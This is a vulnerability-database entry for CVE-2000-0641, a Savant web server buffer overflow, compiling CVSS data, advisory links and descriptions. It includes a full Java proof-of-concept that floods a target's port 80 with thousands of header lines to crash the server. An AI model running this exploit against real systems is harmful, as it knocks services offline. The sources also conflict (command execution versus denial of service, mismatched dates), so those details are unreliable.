CVE-2000-0641
CVSS 7.5
Published: 2000-07-08 00:00:00
Last revised: 2008-09-05 16:21:31

[Original] Savant web server allows remote attackers to execute arbitrary commands via a long GET request.


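[CNNVD] Savant web server arbitrary command execution vulnerability (CNNVD-200007-017)

        A vulnerability exists in the Savant web server. A remote attacker can execute arbitrary commands by means of an overly long GET request.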

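- CVSS (base score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: PARTIAL [likely to result in information disclosure]
Integrity impact: PARTIAL [may allow system files to be modified]
Availability impact: PARTIAL [may cause degraded performance or interrupted access to resources]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]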

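- CPE (affected platforms and products)

Product and version information (CPE) is not currently available

- OVAL (technical details for detection)

No related OVAL definition found

- Official database links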

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0641
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0641
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200007-017
(Official data source) CNNVD

- Other links and resources

http://xforce.iss.net/static/4901.php
(VENDOR_ADVISORY)  XF  savant-get-bo
http://www.securityfocus.com/bid/1453
(VENDOR_ADVISORY)  BID  1453
http://archives.neohapsis.com/archives/bugtraq/2000-07/0114.html
(VENDOR_ADVISORY)  BUGTRAQ  20000708 gnu-pop3d (FTGate problem), Savant Webserver, Guild FTPd

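- Vulnerability information

Savant web server arbitrary command execution vulnerability
High risk  Unknown
2000-07-08 00:00:00 2005-05-02 00:00:00
Remote
        A vulnerability exists in the Savant web server. A remote attacker can execute arbitrary commands by means of an overly long GET request.

- Advisories and patches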

        

- Vulnerability information (20066)

Michael Lamont Savant WebServer 2.1/3.0 Buffer Overflow Vulnerability (EDBID:20066)
windows remote
2000-07-03 Verified
0 Wizdumb
N/A [Click to download]
source: http://www.securityfocus.com/bid/1453/info

A buffer overflow exists in the Savant Web Server. It is possible to exploit this overflow by sending an unusually long GET request to the server.


/* The MDMA Crew's proof-of-concept code for the buffer overflow in Savant
 * Written by Wizdumb <wizdumb@leet.org || www.mdma.za.net/fk>
 *
 * The overflow occurs when the server receives too many headers in the GET
 * request. The results of the attack look something like...
 *
 * SAVANT caused an invalid page fault
 * in module KERNEL32.DLL at 015f:bff87eb5.
 *
 * Registers:
 *
 * EAX=c00300ec CS=015f EIP=bff87eb5 EFLGS=00010212
 * EBX=0119ff90 SS=0167 ESP=0109ffc4 EBP=010a0030
 * ECX=010a01e4 DS=0167 ESI=8162f198 FS=20f7
 * EDX=bff76859 ES=0167 EDI=010a020c GS=0000
 *
 * Bytes at CS:EIP:
 * 53 56 57 8b 30 83 7d 10 01 8b 4e 38 89 4d f8 75
 *
 * Stack dump:
 *
 * Enjoy!
 * Andrew Lewis aka. Wizdumb [03/07/2000]
 */

import java.io.*;
import java.net.*;

class savantstack {

 public static void main(String[] args) throws IOException {
   
   if (args.length != 1) {
     System.out.println("Syntax: java savantstack [hostname/ip]");
     System.exit(1); }
   
   Socket soq = null;
   PrintWriter white = null;
   
   int i = 5000; // This should do fine :-)
   
   soq = new Socket(args[0], 80);
   white = new PrintWriter(soq.getOutputStream(), true);
   
   System.out.print("Showing " + args[0] + " the phj33r :P ...");
   white.print("GET /index.html HTTP/1.0");
   for (int x = 0; x < i; x++) white.println("A:A");
   white.println("\n");
   System.out.println("Done!");
   
   white.close();
   soq.close(); } }
		

- Vulnerability information

1456
Savant Web Server GET Request Remote Overflow
Remote / Network Access Denial of Service, Input Manipulation
Loss of Integrity, Loss of Availability Solution Unknown
Exploit Public Third-party Verified

- Vulnerability description

A remote overflow exists in Savant Web Server. The application fails to perform proper bounds checking, resulting in a buffer overflow. By sending an overly long GET request of 260 bytes or more, a remote attacker can cause the application to crash, resulting in a loss of availability.

- Timeline

2000-06-08 Unknown
2000-06-08 Unknown

- Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- Related references

- Vulnerability author
